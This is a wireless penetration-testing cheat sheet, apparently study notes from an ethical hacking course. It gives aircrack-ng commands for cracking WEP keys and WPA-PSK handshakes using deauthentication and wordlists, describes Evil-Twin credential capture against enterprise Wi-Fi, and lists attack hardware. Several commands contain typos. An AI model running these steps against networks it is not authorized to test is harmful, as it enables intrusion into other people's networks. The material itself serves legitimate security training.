Wireless pentest

Open network

  • Usually for guest access and only for internet

  • The guest can access it directly or they need to authenticate through a portal


  • This protocol has been completely broken for many years and should not be used anymore.

  • We can find the key very easily

# Capture around 30 000 IV (maybe more)
airodump-ng -c 11 --bssid 60:A4:4C:20:DF:60 -w [OUTPUTFILENAME] wlan0mon
# Generate ARP traffic
aireplay-ng -3 -b 00::09:58:6F:64:1E -h 44:60:57:c8:58:A0 wlan0mon
# Monitor the number of IV with
Aircrack out.cap
# Break the key
Aircrack out.cap


  • 2 authentication modes :

    • Personal = WPA PSK (Pre-Shared Key) = authentification by a secret shared with everyone (like at home)

    • Enterprise = WPA MGT (Management) = EAP (Extensible Authentication Protocol). It is possible to use several different EAP methods (see the official list on the IANA website) but here are the most common versions:

      • PEAP : historically the only protocol supported by Windows, transmits the credentials of the AD via an MSCHAPv2, thus allowing to recover a NetNTLMv2 hash through the Evil-Twin attack.

      • EAP-TTLS : very similar, can authenticate via login/password which can be recovered via the Evil-Twin attack if the clients do not check the certifcat of the access point.

      • EAP-TLS : mutual authentication by certificate.

The Hacking process

Source: Practical Ethical Hacking - TCM Security

# check if the wireless card is detected
# shut card if necessary
ifconfig wlan0 down
# kill all interference
airmon-ng check kill
# put the card in monitor mode
iwconfig wlan0 mode monitor
# relaunch it
ifconfig wlan0 up


# check if the wireless card is detected
# kill all interference
airmon-ng check kill
# put card in monitor mode
airmon-ng start wlan0
# check if it worked
# Find the ssid in our scope for the test
airodump-ng wlan0mon
# monitor our target for handshakes. For -c we need to specify the channel number found with the previous command and for the bssid option we need the mac address we also found with the previous command
airodump-ng -c <channel-number> --bbsid <MAC-ADDRESS> -w outfile 
# sending deauth
airplay-ng -0 1 -a <MAC-ADDRESS> -c <MAC-ADDRESS-STATION> wlanmon0
# check our capture .ap file to crack the handshake
ls capture*
# crack the handshake with a wordlist
aircrack-ng -w wordlist -b <MAC-ADDRESS> capture-NN.cap 



  • The following are equipment that can be used for wifi pentest

    • Wireless card Alfa AWUD036NH

    • Alfa AWUS1900

    • Alfa AWUS036ACH

    • Alfa AWUS052NH

    • Alfa AWUS051NH

    • Alfa AWUS036NHR

    • TP-Link TL-WN722N

    • Hak5 Pineapple Nano Basic

    • Flipper Zero along with the wifi dev board


Last updated